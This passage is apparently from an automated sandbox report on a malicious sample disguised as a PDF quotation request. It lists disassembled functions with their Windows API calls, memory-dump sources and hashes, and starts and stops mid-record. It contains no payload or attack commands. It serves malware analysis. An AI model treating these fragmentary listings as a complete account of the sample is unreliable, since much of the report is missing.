                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                    • String ID:
                                                                    • API String ID: 15295421-0
                                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                    Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 780548581-3081909835
                                                                    • Opcode ID: ca32d8b5daa25cf76ab800feac3d76d182c9ad6713458097c0e165800db287f0
                                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                    • Opcode Fuzzy Hash: ca32d8b5daa25cf76ab800feac3d76d182c9ad6713458097c0e165800db287f0
                                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                    Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                    • String ID:
                                                                    • API String ID: 4082120231-0
                                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                    Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2027346449-0
                                                                    • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                    • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                    Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                    • GetMenu.USER32 ref: 0047A703
                                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3257027151-0
                                                                    • Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                    • Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                    Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastselect
                                                                    • String ID:
                                                                    • API String ID: 215497628-0
                                                                    • Opcode ID: aac5e18a3bb97d0b3b057d0757e795e8db7db4a5794c1ad7995d0996ba845476
                                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                    • Opcode Fuzzy Hash: aac5e18a3bb97d0b3b057d0757e795e8db7db4a5794c1ad7995d0996ba845476
                                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                    Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0044443B
                                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                    Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00444633
                                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                    Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                    • String ID:
                                                                    • API String ID: 2354583917-0
                                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                    Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                    Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                    • String ID:
                                                                    • API String ID: 896007046-0
                                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                    Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                    • GetFocus.USER32 ref: 00448ACF
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                    • String ID:
                                                                    • API String ID: 3429747543-0
                                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                    Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu$\VH
                                                                    • API String ID: 3164766367-2432546070
                                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                    Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
